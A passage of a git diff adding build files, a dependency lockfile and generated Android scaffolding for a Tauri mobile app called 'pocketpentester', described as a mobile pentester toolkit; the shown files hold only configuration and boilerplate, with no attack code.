+checksum = "1e38bc4d79ed67fd075bcc251a1c39b32a1776bbe92e5bef1f0bf1f8c531853b"
+dependencies = [
+ "windows-targets 0.52.6",
+]
+
+[[package]]
+name = "windows-sys"
+version = "0.60.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f2f500e4d28234f72040990ec9d39e3a6b950f9f22d3dba18416c35882612bcb"
+dependencies = [
+ "windows-targets 0.53.5",
+]
+
+[[package]]
+name = "windows-sys"
+version = "0.61.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc"
+dependencies = [
+ "windows-link 0.2.1",
+]
+
+[[package]]
+name = "windows-targets"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8e5180c00cd44c9b1c88adb3693291f1cd93605ded80c250a75d472756b4d071"
+dependencies = [
+ "windows_aarch64_gnullvm 0.42.2",
+ "windows_aarch64_msvc 0.42.2",
+ "windows_i686_gnu 0.42.2",
+ "windows_i686_msvc 0.42.2",
+ "windows_x86_64_gnu 0.42.2",
+ "windows_x86_64_gnullvm 0.42.2",
+ "windows_x86_64_msvc 0.42.2",
+]
+
+[[package]]
+name = "windows-targets"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973"
+dependencies = [
+ "windows_aarch64_gnullvm 0.52.6",
+ "windows_aarch64_msvc 0.52.6",
+ "windows_i686_gnu 0.52.6",
+ "windows_i686_gnullvm 0.52.6",
+ "windows_i686_msvc 0.52.6",
+ "windows_x86_64_gnu 0.52.6",
+ "windows_x86_64_gnullvm 0.52.6",
+ "windows_x86_64_msvc 0.52.6",
+]
+
+[[package]]
+name = "windows-targets"
+version = "0.53.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4945f9f551b88e0d65f3db0bc25c33b8acea4d9e41163edf90dcd0b19f9069f3"
+dependencies = [
+ "windows-link 0.2.1",
+ "windows_aarch64_gnullvm 0.53.1",
+ "windows_aarch64_msvc 0.53.1",
+ "windows_i686_gnu 0.53.1",
+ "windows_i686_gnullvm 0.53.1",
+ "windows_i686_msvc 0.53.1",
+ "windows_x86_64_gnu 0.53.1",
+ "windows_x86_64_gnullvm 0.53.1",
+ "windows_x86_64_msvc 0.53.1",
+]
+
+[[package]]
+name = "windows-threading"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b66463ad2e0ea3bbf808b7f1d371311c80e115c0b71d60efc142cafbcfb057a6"
+dependencies = [
+ "windows-link 0.1.3",
+]
+
+[[package]]
+name = "windows-version"
+version = "0.1.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e4060a1da109b9d0326b7262c8e12c84df67cc0dbc9e33cf49e01ccc2eb63631"
+dependencies = [
+ "windows-link 0.2.1",
+]
+
+[[package]]
+name = "windows_aarch64_gnullvm"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "597a5118570b68bc08d8d59125332c54f1ba9d9adeedeef5b99b02ba2b0698f8"
+
+[[package]]
+name = "windows_aarch64_gnullvm"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3"
+
+[[package]]
+name = "windows_aarch64_gnullvm"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a9d8416fa8b42f5c947f8482c43e7d89e73a173cead56d044f6a56104a6d1b53"
+
+[[package]]
+name = "windows_aarch64_msvc"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e08e8864a60f06ef0d0ff4ba04124db8b0fb3be5776a5cd47641e942e58c4d43"
+
+[[package]]
+name = "windows_aarch64_msvc"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469"
+
+[[package]]
+name = "windows_aarch64_msvc"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b9d782e804c2f632e395708e99a94275910eb9100b2114651e04744e9b125006"
+
+[[package]]
+name = "windows_i686_gnu"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c61d927d8da41da96a81f029489353e68739737d3beca43145c8afec9a31a84f"
+
+[[package]]
+name = "windows_i686_gnu"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b"
+
+[[package]]
+name = "windows_i686_gnu"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "960e6da069d81e09becb0ca57a65220ddff016ff2d6af6a223cf372a506593a3"
+
+[[package]]
+name = "windows_i686_gnullvm"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66"
+
+[[package]]
+name = "windows_i686_gnullvm"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fa7359d10048f68ab8b09fa71c3daccfb0e9b559aed648a8f95469c27057180c"
+
+[[package]]
+name = "windows_i686_msvc"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "44d840b6ec649f480a41c8d80f9c65108b92d89345dd94027bfe06ac444d1060"
+
+[[package]]
+name = "windows_i686_msvc"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66"
+
+[[package]]
+name = "windows_i686_msvc"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e7ac75179f18232fe9c285163565a57ef8d3c89254a30685b57d83a38d326c2"
+
+[[package]]
+name = "windows_x86_64_gnu"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8de912b8b8feb55c064867cf047dda097f92d51efad5b491dfb98f6bbb70cb36"
+
+[[package]]
+name = "windows_x86_64_gnu"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78"
+
+[[package]]
+name = "windows_x86_64_gnu"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9c3842cdd74a865a8066ab39c8a7a473c0778a3f29370b5fd6b4b9aa7df4a499"
+
+[[package]]
+name = "windows_x86_64_gnullvm"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "26d41b46a36d453748aedef1486d5c7a85db22e56aff34643984ea85514e94a3"
+
+[[package]]
+name = "windows_x86_64_gnullvm"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d"
+
+[[package]]
+name = "windows_x86_64_gnullvm"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0ffa179e2d07eee8ad8f57493436566c7cc30ac536a3379fdf008f47f6bb7ae1"
+
+[[package]]
+name = "windows_x86_64_msvc"
+version = "0.42.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9aec5da331524158c6d1a4ac0ab1541149c0b9505fde06423b02f5ef0106b9f0"
+
+[[package]]
+name = "windows_x86_64_msvc"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec"
+
+[[package]]
+name = "windows_x86_64_msvc"
+version = "0.53.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d6bbff5f0aada427a1e5a6da5f1f98158182f26556f345ac9e04d36d0ebed650"
+
+[[package]]
+name = "winnow"
+version = "0.5.40"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f593a95398737aeed53e489c785df13f3618e41dbcd6718c6addbf1395aa6876"
+dependencies = [
+ "memchr",
+]
+
+[[package]]
+name = "winnow"
+version = "0.7.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df79d97927682d2fd8adb29682d1140b343be4ac0f08fd68b7765d9c059d3945"
+dependencies = [
+ "memchr",
+]
+
+[[package]]
+name = "winnow"
+version = "1.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09dac053f1cd375980747450bfc7250c264eaae0583872e845c0c7cd578872b5"
+dependencies = [
+ "memchr",
+]
+
+[[package]]
+name = "winreg"
+version = "0.55.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cb5a765337c50e9ec252c2069be9bf91c7df47afb103b642ba3a53bf8101be97"
+dependencies = [
+ "cfg-if",
+ "windows-sys 0.59.0",
+]
+
+[[package]]
+name = "wit-bindgen"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5"
+dependencies = [
+ "wit-bindgen-rust-macro",
+]
+
+[[package]]
+name = "wit-bindgen-core"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ea61de684c3ea68cb082b7a88508a8b27fcc8b797d738bfc99a82facf1d752dc"
+dependencies = [
+ "anyhow",
+ "heck 0.5.0",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-bindgen-rust"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b7c566e0f4b284dd6561c786d9cb0142da491f46a9fbed79ea69cdad5db17f21"
+dependencies = [
+ "anyhow",
+ "heck 0.5.0",
+ "indexmap 2.14.0",
+ "prettyplease",
+ "syn 2.0.117",
+ "wasm-metadata",
+ "wit-bindgen-core",
+ "wit-component",
+]
+
+[[package]]
+name = "wit-bindgen-rust-macro"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0c0f9bfd77e6a48eccf51359e3ae77140a7f50b1e2ebfe62422d8afdaffab17a"
+dependencies = [
+ "anyhow",
+ "prettyplease",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "wit-bindgen-core",
+ "wit-bindgen-rust",
+]
+
+[[package]]
+name = "wit-component"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2"
+dependencies = [
+ "anyhow",
+ "bitflags 2.11.1",
+ "indexmap 2.14.0",
+ "log",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "wasm-encoder",
+ "wasm-metadata",
+ "wasmparser",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-parser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ecc8ac4bc1dc3381b7f59c34f00b67e18f910c2c0f50015669dde7def656a736"
+dependencies = [
+ "anyhow",
+ "id-arena",
+ "indexmap 2.14.0",
+ "log",
+ "semver",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "unicode-xid",
+ "wasmparser",
+]
+
+[[package]]
+name = "writeable"
+version = "0.6.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1ffae5123b2d3fc086436f8834ae3ab053a283cfac8fe0a0b8eaae044768a4c4"
+
+[[package]]
+name = "wry"
+version = "0.54.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e5a8135d8676225e5744de000d4dff5a082501bf7db6a1c1495034f8c314edbc"
+dependencies = [
+ "base64 0.22.1",
+ "block2",
+ "cookie",
+ "crossbeam-channel",
+ "dirs",
+ "dom_query",
+ "dpi",
+ "dunce",
+ "gdkx11",
+ "gtk",
+ "http",
+ "javascriptcore-rs",
+ "jni",
+ "libc",
+ "ndk",
+ "objc2",
+ "objc2-app-kit",
+ "objc2-core-foundation",
+ "objc2-foundation",
+ "objc2-ui-kit",
+ "objc2-web-kit",
+ "once_cell",
+ "percent-encoding",
+ "raw-window-handle",
+ "sha2",
+ "soup3",
+ "tao-macros",
+ "thiserror 2.0.18",
+ "url",
+ "webkit2gtk",
+ "webkit2gtk-sys",
+ "webview2-com",
+ "windows",
+ "windows-core 0.61.2",
+ "windows-version",
+ "x11-dl",
+]
+
+[[package]]
+name = "x11"
+version = "2.21.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "502da5464ccd04011667b11c435cb992822c2c0dbde1770c988480d312a0db2e"
+dependencies = [
+ "libc",
+ "pkg-config",
+]
+
+[[package]]
+name = "x11-dl"
+version = "2.21.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "38735924fedd5314a6e548792904ed8c6de6636285cb9fec04d5b1db85c1516f"
+dependencies = [
+ "libc",
+ "once_cell",
+ "pkg-config",
+]
+
+[[package]]
+name = "x509-parser"
+version = "0.17.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4569f339c0c402346d4a75a9e39cf8dad310e287eef1ff56d4c68e5067f53460"
+dependencies = [
+ "asn1-rs",
+ "data-encoding",
+ "der-parser",
+ "lazy_static",
+ "nom",
+ "oid-registry",
+ "rusticata-macros",
+ "thiserror 2.0.18",
+ "time",
+]
+
+[[package]]
+name = "yoke"
+version = "0.8.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "abe8c5fda708d9ca3df187cae8bfb9ceda00dd96231bed36e445a1a48e66f9ca"
+dependencies = [
+ "stable_deref_trait",
+ "yoke-derive",
+ "zerofrom",
+]
+
+[[package]]
+name = "yoke-derive"
+version = "0.8.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "de844c262c8848816172cef550288e7dc6c7b7814b4ee56b3e1553f275f1858e"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "synstructure",
+]
+
+[[package]]
+name = "zbus"
+version = "5.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ca82f95dbd3943a40a53cfded6c2d0a2ca26192011846a1810c4256ef92c60bc"
+dependencies = [
+ "async-broadcast",
+ "async-executor",
+ "async-io",
+ "async-lock",
+ "async-process",
+ "async-recursion",
+ "async-task",
+ "async-trait",
+ "blocking",
+ "enumflags2",
+ "event-listener",
+ "futures-core",
+ "futures-lite",
+ "hex",
+ "libc",
+ "ordered-stream",
+ "rustix",
+ "serde",
+ "serde_repr",
+ "tracing",
+ "uds_windows",
+ "uuid",
+ "windows-sys 0.61.2",
+ "winnow 0.7.15",
+ "zbus_macros",
+ "zbus_names",
+ "zvariant",
+]
+
+[[package]]
+name = "zbus_macros"
+version = "5.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "897e79616e84aac4b2c46e9132a4f63b93105d54fe8c0e8f6bffc21fa8d49222"
+dependencies = [
+ "proc-macro-crate 3.5.0",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "zbus_names",
+ "zvariant",
+ "zvariant_utils",
+]
+
+[[package]]
+name = "zbus_names"
+version = "4.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ffd8af6d5b78619bab301ff3c560a5bd22426150253db278f164d6cf3b72c50f"
+dependencies = [
+ "serde",
+ "winnow 0.7.15",
+ "zvariant",
+]
+
+[[package]]
+name = "zerocopy"
+version = "0.8.48"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eed437bf9d6692032087e337407a86f04cd8d6a16a37199ed57949d415bd68e9"
+dependencies = [
+ "zerocopy-derive",
+]
+
+[[package]]
+name = "zerocopy-derive"
+version = "0.8.48"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "70e3cd084b1788766f53af483dd21f93881ff30d7320490ec3ef7526d203bad4"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "zerofrom"
+version = "0.1.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "69faa1f2a1ea75661980b013019ed6687ed0e83d069bc1114e2cc74c6c04c4df"
+dependencies = [
+ "zerofrom-derive",
+]
+
+[[package]]
+name = "zerofrom-derive"
+version = "0.1.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "11532158c46691caf0f2593ea8358fed6bbf68a0315e80aae9bd41fbade684a1"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "synstructure",
+]
+
+[[package]]
+name = "zeroize"
+version = "1.8.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b97154e67e32c85465826e8bcc1c59429aaaf107c1e4a9e53c8d8ccd5eff88d0"
+
+[[package]]
+name = "zerotrie"
+version = "0.2.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0f9152d31db0792fa83f70fb2f83148effb5c1f5b8c7686c3459e361d9bc20bf"
+dependencies = [
+ "displaydoc",
+ "yoke",
+ "zerofrom",
+]
+
+[[package]]
+name = "zerovec"
+version = "0.11.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "90f911cbc359ab6af17377d242225f4d75119aec87ea711a880987b18cd7b239"
+dependencies = [
+ "yoke",
+ "zerofrom",
+ "zerovec-derive",
+]
+
+[[package]]
+name = "zerovec-derive"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "625dc425cab0dca6dc3c3319506e6593dcb08a9f387ea3b284dbd52a92c40555"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "zmij"
+version = "1.0.21"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa"
+
+[[package]]
+name = "zvariant"
+version = "5.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5708299b21903bbe348e94729f22c49c55d04720a004aa350f1f9c122fd2540b"
+dependencies = [
+ "endi",
+ "enumflags2",
+ "serde",
+ "winnow 0.7.15",
+ "zvariant_derive",
+ "zvariant_utils",
+]
+
+[[package]]
+name = "zvariant_derive"
+version = "5.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5b59b012ebe9c46656f9cc08d8da8b4c726510aef12559da3e5f1bf72780752c"
+dependencies = [
+ "proc-macro-crate 3.5.0",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "zvariant_utils",
+]
+
+[[package]]
+name = "zvariant_utils"
+version = "3.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f75c23a64ef8f40f13a6989991e643554d9bef1d682a281160cf0c1bc389c5e9"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "serde",
+ "syn 2.0.117",
+ "winnow 0.7.15",
+]
diff --git a/src-tauri/Cargo.toml b/src-tauri/Cargo.toml
new file mode 100644
index 0000000..baf97f1
--- /dev/null
+++ b/src-tauri/Cargo.toml
@@ -0,0 +1,48 @@
+[package]
+name = "pocketpentester"
+version = "0.1.0"
+description = "Mobile pentester toolkit"
+authors = ["imtaqin"]
+edition = "2021"
+
+[lib]
+name = "pocketpentester_lib"
+crate-type = ["staticlib", "cdylib", "rlib"]
+
+[build-dependencies]
+tauri-build = { version = "2", features = [] }
+
+[dependencies]
+tauri = { version = "2", features = [] }
+tauri-plugin-opener = "2"
+serde = { version = "1", features = ["derive"] }
+serde_json = "1"
+
+tokio = { version = "1", features = ["rt-multi-thread", "net", "time", "macros", "sync", "io-util", "fs"] }
+walkdir = "2"
+local-ip-address = "0.6"
+rustls = { version = "0.23", default-features = false, features = ["std", "ring"] }
+tokio-rustls = { version = "0.26", default-features = false, features = ["ring"] }
+x509-parser = "0.17"
+rustls-pki-types = "1"
+md5 = "0.7"
+futures = "0.3"
+reqwest = { version = "0.12", default-features = false, features = ["rustls-tls", "gzip", "json", "cookies"] }
+hickory-resolver = "0.24"
+anyhow = "1"
+regex = "1"
+once_cell = "1"
+url = "2"
+base64 = "0.22"
+hmac = "0.12"
+sha2 = "0.10"
+rand = "0.8"
+serde_yaml = "0.9"
+urlencoding = "2"
+
+[profile.release]
+opt-level = "z"
+lto = true
+codegen-units = 1
+strip = true
+panic = "abort"
diff --git a/src-tauri/build.rs b/src-tauri/build.rs
new file mode 100644
index 0000000..d860e1e
--- /dev/null
+++ b/src-tauri/build.rs
@@ -0,0 +1,3 @@
+fn main() {
+    tauri_build::build()
+}
diff --git a/src-tauri/capabilities/default.json b/src-tauri/capabilities/default.json
new file mode 100644
index 0000000..4cdbf49
--- /dev/null
+++ b/src-tauri/capabilities/default.json
@@ -0,0 +1,10 @@
+{
+  "$schema": "../gen/schemas/desktop-schema.json",
+  "identifier": "default",
+  "description": "Capability for the main window",
+  "windows": ["main"],
+  "permissions": [
+    "core:default",
+    "opener:default"
+  ]
+}
diff --git a/src-tauri/gen/android/.editorconfig b/src-tauri/gen/android/.editorconfig
new file mode 100644
index 0000000..ebe51d3
--- /dev/null
+++ b/src-tauri/gen/android/.editorconfig
@@ -0,0 +1,12 @@
+# EditorConfig is awesome: https://EditorConfig.org
+
+# top-most EditorConfig file
+root = true
+
+[*]
+indent_style = space
+indent_size = 2
+end_of_line = lf
+charset = utf-8
+trim_trailing_whitespace = false
+insert_final_newline = false
\ No newline at end of file
diff --git a/src-tauri/gen/android/.gitignore b/src-tauri/gen/android/.gitignore
new file mode 100644
index 0000000..b248203
--- /dev/null
+++ b/src-tauri/gen/android/.gitignore
@@ -0,0 +1,19 @@
+*.iml
+.gradle
+/local.properties
+/.idea/caches
+/.idea/libraries
+/.idea/modules.xml
+/.idea/workspace.xml
+/.idea/navEditor.xml
+/.idea/assetWizardSettings.xml
+.DS_Store
+build
+/captures
+.externalNativeBuild
+.cxx
+local.properties
+key.properties
+
+/.tauri
+/tauri.settings.gradle
\ No newline at end of file
diff --git a/src-tauri/gen/android/app/.gitignore b/src-tauri/gen/android/app/.gitignore
new file mode 100644
index 0000000..6c4d56b
--- /dev/null
+++ b/src-tauri/gen/android/app/.gitignore
@@ -0,0 +1,6 @@
+/src/main/**/generated
+/src/main/jniLibs/**/*.so
+/src/main/assets/tauri.conf.json
+/tauri.build.gradle.kts
+/proguard-tauri.pro
+/tauri.properties
\ No newline at end of file
diff --git a/src-tauri/gen/android/app/build.gradle.kts b/src-tauri/gen/android/app/build.gradle.kts
new file mode 100644
index 0000000..55f1fab
--- /dev/null
+++ b/src-tauri/gen/android/app/build.gradle.kts
@@ -0,0 +1,70 @@
+import java.util.Properties
+
+plugins {
+    id("com.android.application")
+    id("org.jetbrains.kotlin.android")
+    id("rust")
+}
+
+val tauriProperties = Properties().apply {
+    val propFile = file("tauri.properties")
+    if (propFile.exists()) {
+        propFile.inputStream().use { load(it) }
+    }
+}
+
+android {
+    compileSdk = 36
+    namespace = "com.imtaqin.pocketpentester"
+    defaultConfig {
+        manifestPlaceholders["usesCleartextTraffic"] = "false"
+        applicationId = "com.imtaqin.pocketpentester"
+        minSdk = 24
+        targetSdk = 36
+        versionCode = tauriProperties.getProperty("tauri.android.versionCode", "1").toInt()
+        versionName = tauriProperties.getProperty("tauri.android.versionName", "1.0")
+    }
+    buildTypes {
+        getByName("debug") {
+            manifestPlaceholders["usesCleartextTraffic"] = "true"
+            isDebuggable = true
+            isJniDebuggable = true
+            isMinifyEnabled = false
+            packaging {                jniLibs.keepDebugSymbols.add("*/arm64-v8a/*.so")
+                jniLibs.keepDebugSymbols.add("*/armeabi-v7a/*.so")
+                jniLibs.keepDebugSymbols.add("*/x86/*.so")
+                jniLibs.keepDebugSymbols.add("*/x86_64/*.so")
+            }
+        }
+        getByName("release") {
+            isMinifyEnabled = true
+            proguardFiles(
+                *fileTree(".") { include("**/*.pro") }
+                    .plus(getDefaultProguardFile("proguard-android-optimize.txt"))
+                    .toList().toTypedArray()
+            )
+        }
+    }
+    kotlinOptions {
+        jvmTarget = "1.8"
+    }
+    buildFeatures {
+        buildConfig = true
+    }
+}
+
+rust {
+    rootDirRel = "../../../"
+}
+
+dependencies {
+    implementation("androidx.webkit:webkit:1.14.0")
+    implementation("androidx.appcompat:appcompat:1.7.1")
+    implementation("androidx.activity:activity-ktx:1.10.1")
+    implementation("com.google.android.material:material:1.12.0")
+    testImplementation("junit:junit:4.13.2")
+    androidTestImplementation("androidx.test.ext:junit:1.1.4")
+    androidTestImplementation("androidx.test.espresso:espresso-core:3.5.0")
+}
+
+apply(from = "tauri.build.gradle.kts")
\ No newline at end of file
diff --git a/src-tauri/gen/android/app/proguard-rules.pro b/src-tauri/gen/android/app/proguard-rules.pro
new file mode 100644
index 0000000..481bb43
--- /dev/null
+++ b/src-tauri/gen/android/app/proguard-rules.pro
@@ -0,0 +1,21 @@
+# Add project specific ProGuard rules here.
+# You can control the set of applied configuration files using the
+# proguardFiles setting in build.gradle.
+#
+# For more details, see
+#   http://developer.android.com/guide/developing/tools/proguard.html
+
+# If your project uses WebView with JS, uncomment the following
+# and specify the fully qualified class name to the JavaScript interface
+# class:
+#-keepclassmembers class fqcn.of.javascript.interface.for.webview {
+#   public *;
+#}
+
+# Uncomment this to preserve the line number information for
+# debugging stack traces.
+#-keepattributes SourceFile,LineNumberTable
+
+# If you keep the line number information, uncomment this to
+# hide the original source file name.
+#-renamesourcefileattribute SourceFile
\ No newline at end of file
diff --git a/src-tauri/gen/android/app/src/main/AndroidManifest.xml b/src-tauri/gen/android/app/src/main/AndroidManifest.xml
new file mode 100644
index 0000000..3b8900a
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/AndroidManifest.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<manifest xmlns:android="http://schemas.android.com/apk/res/android">
+    <uses-permission android:name="android.permission.INTERNET" />
+
+    <!-- AndroidTV support -->
+    <uses-feature android:name="android.software.leanback" android:required="false" />
+
+    <application
+        android:icon="@mipmap/ic_launcher"
+        android:label="@string/app_name"
+        android:theme="@style/Theme.pocketpentester"
+        android:usesCleartextTraffic="${usesCleartextTraffic}">
+        <activity
+            android:configChanges="orientation|keyboardHidden|keyboard|screenSize|locale|smallestScreenSize|screenLayout|uiMode"
+            android:launchMode="singleTask"
+            android:label="@string/main_activity_title"
+            android:name=".MainActivity"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+                <category android:name="android.intent.category.LAUNCHER" />
+                <!-- AndroidTV support -->
+                <category android:name="android.intent.category.LEANBACK_LAUNCHER" />
+            </intent-filter>
+        </activity>
+
+        <provider
+          android:name="androidx.core.content.FileProvider"
+          android:authorities="${applicationId}.fileprovider"
+          android:exported="false"
+          android:grantUriPermissions="true">
+          <meta-data
+            android:name="android.support.FILE_PROVIDER_PATHS"
+            android:resource="@xml/file_paths" />
+        </provider>
+    </application>
+</manifest>
diff --git a/src-tauri/gen/android/app/src/main/java/com/imtaqin/pocketpentester/MainActivity.kt b/src-tauri/gen/android/app/src/main/java/com/imtaqin/pocketpentester/MainActivity.kt
new file mode 100644
index 0000000..c06ee0e
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/java/com/imtaqin/pocketpentester/MainActivity.kt
@@ -0,0 +1,11 @@
+package com.imtaqin.pocketpentester
+
+import android.os.Bundle
+import androidx.activity.enableEdgeToEdge
+
+class MainActivity : TauriActivity() {
+  override fun onCreate(savedInstanceState: Bundle?) {
+    enableEdgeToEdge()
+    super.onCreate(savedInstanceState)
+  }
+}
diff --git a/src-tauri/gen/android/app/src/main/res/drawable-v24/ic_launcher_foreground.xml b/src-tauri/gen/android/app/src/main/res/drawable-v24/ic_launcher_foreground.xml
new file mode 100644
index 0000000..2b068d1
--- /dev/null
+++ b/src-tauri/gen/android/app/src/main/res/drawable-v24/ic_launcher_foreground.xml
@@ -0,0 +1,30 @@
+<vector xmlns:android="http://schemas.android.com/apk/res/android"
+    xmlns:aapt="http://schemas.android.com/aapt"
+    android:width="108dp"
+    android:height="108dp"
+    android:viewportWidth="108"
+    android:viewportHeight="108">
+    <path android:pathData="M31,63.928c0,0 6.4,-11 12.1,-13.1c7.2,-2.6 26,-1.4 26,-1.4l38.1,38.1L107,108.928l-32,-1L31,63.928z">
+        <aapt:attr name="android:fillColor">
+            <gradient
+                android:endX="85.84757"
+                android:endY="92.4963"
+                android:startX="42.9492"
+                android:startY="49.59793"
+                android:type="linear">
+                <item
+                    android:color="#44000000"
+                    android:offset="0.0" />
+                <item
+                    android:color="#00000000"
+                    android:offset="1.0" />
+            </gradient>
+        </aapt:attr>
+    </path>
+    <path
+        android:fillColor="#FFFFFF"
+        android:fillType="nonZero"
